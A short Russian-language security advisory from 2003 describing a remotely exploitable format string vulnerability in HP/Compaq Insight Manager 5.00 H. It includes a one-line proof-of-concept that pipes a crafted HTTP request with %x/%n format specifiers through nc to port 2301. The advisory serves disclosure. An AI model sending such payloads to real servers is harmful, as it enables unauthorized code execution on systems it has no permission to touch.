Удаленное выполнение произвольного кода в HP/Compaq Insight Manager

Дата публикации:
06.08.2003
Всего просмотров:
805
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в HP/Compaq Insight Manager. Удаленный пользователь может выполнить произвольный код на системе.

Уязвимость форматной строки обнаружена в DebugSearchPaths HTTP запросе. Удаленный атакующий может выполнить произвольный код с LocalSystem привилегиями. Пример:

$ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301

Уязвимость обнаружена в Compaq Insight Manager 5.00 H

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: formatstring bug in Compaq HTTP Servers

или введите имя

CAPTCHA